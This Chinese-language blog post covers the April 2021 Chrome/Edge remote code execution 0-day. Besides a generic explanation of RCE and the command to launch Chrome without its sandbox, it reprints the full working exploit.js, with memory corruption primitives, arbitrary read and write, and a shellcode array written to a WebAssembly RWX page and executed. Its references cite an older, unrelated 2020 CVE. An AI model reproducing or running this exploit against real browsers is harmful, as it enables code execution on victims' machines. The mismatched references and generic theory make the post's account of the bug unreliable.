2021HW — Chrome 0day漏洞

2021HW — Chrome 0day简述

漏洞环境

过程

修复建议

参考


2021HW — Chrome 0day漏洞

2021HW — Chrome 0day漏洞

简述

北京时间4月13日凌晨,安全研究人员Rajvardhan Agarwal在推特上发布了一个可远程代码执行(RCE)的0Day漏洞,该漏洞可在当前版本的谷歌Chrome浏览器和微软Edge上运行。

 

为了测试该漏洞,研究者关闭了浏览器Edge 89.0.774.76版本和Chrome 89.0.4389.114版本的沙盒

2021HW — Chrome 0day漏洞

分析 https://zhuanlan.zhihu.com/p/29097125

原理

远程系统命令执行

一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。

如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器。

现在很多的甲方企业都开始实施自动化运维,大量的系统操作会通过"自动化运维平台"进行操作。在这种平台上往往会出现远程系统命令执行的漏洞。

远程代码执行

同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。
不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。

因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。
 

作用

RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

漏洞环境

2021HW — Chrome 0day漏洞 2021HW — Chrome 0day漏洞

"C:Program FilesGoogleChromeApplicationchrome.exe" -no-sandbox

关闭浏览器的SanBox功能,该功能默认开启

简而言之,正常浏览器是不会被漏洞利用的;除非。。。。。。。。。。。

过程

2021HW — Chrome 0day漏洞

<script src="exploit.js"></script>

/* /* BSD 2-Clause License Copyright (c) 2021, rajvardhan agarwal All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this    list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice,    this list of conditions and the following disclaimer in the documentation    and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */  var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) var wasm_mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(wasm_mod); var f = wasm_instance.exports.main;  var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); let buf2 = new ArrayBuffer(0x150);  function ftoi(val) {     f64_buf[0] = val;     return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); }  function itof(val) {     u64_buf[0] = Number(val & 0xffffffffn);     u64_buf[1] = Number(val >> 32n);     return f64_buf[0]; }  const _arr = new Uint32Array([2**31]);  function foo(a) {     var x = 1; 	x = (_arr[0] ^ 0) + 1;  	x = Math.abs(x); 	x -= 2147483647; 	x = Math.max(x, 0);  	x -= 1; 	if(x==-1) x = 0;  	var arr = new Array(x); 	arr.shift(); 	var cor = [1.1, 1.2, 1.3];  	return [arr, cor]; }  for(var i=0;i<0x3000;++i)     foo(true);  var x = foo(false); var arr = x[0]; var cor = x[1];  const idx = 6; arr[idx+10] = 0x4242;  function addrof(k) {     arr[idx+1] = k;     return ftoi(cor[0]) & 0xffffffffn; }  function fakeobj(k) {     cor[0] = itof(k);     return arr[idx+1]; }  var float_array_map = ftoi(cor[3]);  var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; var fake = fakeobj(addrof(arr2) + 0x20n);  function arbread(addr) {     if (addr % 2n == 0) {         addr += 1n;     }     arr2[1] = itof((2n << 32n) + addr - 8n);     return (fake[0]); }  function arbwrite(addr, val) {     if (addr % 2n == 0) {         addr += 1n;     }     arr2[1] = itof((2n << 32n) + addr - 8n);     fake[0] = itof(BigInt(val)); }  function copy_shellcode(addr, shellcode) {     let dataview = new DataView(buf2);     let buf_addr = addrof(buf2);     let backing_store_addr = buf_addr + 0x14n;     arbwrite(backing_store_addr, addr);      for (let i = 0; i < shellcode.length; i++) {         dataview.setUint32(4*i, shellcode[i], true);     } }  var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16)); var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; copy_shellcode(rwx_page_addr, shellcode); f(); 

通过执行shellcode 命令,攻击浏览器执行RCE命令

2021HW — Chrome 0day漏洞 2021HW — Chrome 0day漏洞

修复建议

及时升级到最新版本的谷歌浏览器(https://www.google.com/intl/zh-CN/chrome/)以及Edge浏览器(https://www.microsoft.com/en-us/edge)。

参考

[1] https://bugs.chromium.org/p/chromium/issues/detail?id=1053604

[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418

[3] https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html

[4] https://www.zdnet.com/article/google-patches-chrome-zero-day-under-active-attacks/

[5] https://docs.microsoft.com/zh-cn/deployedge/microsoft-edge-relnotes-security

 

 

2021HW — Chrome 0day漏洞

版权声明:玥玥 发表于 2021-04-14 23:08:51。
转载请注明:2021HW — Chrome 0day漏洞 | 女黑客导航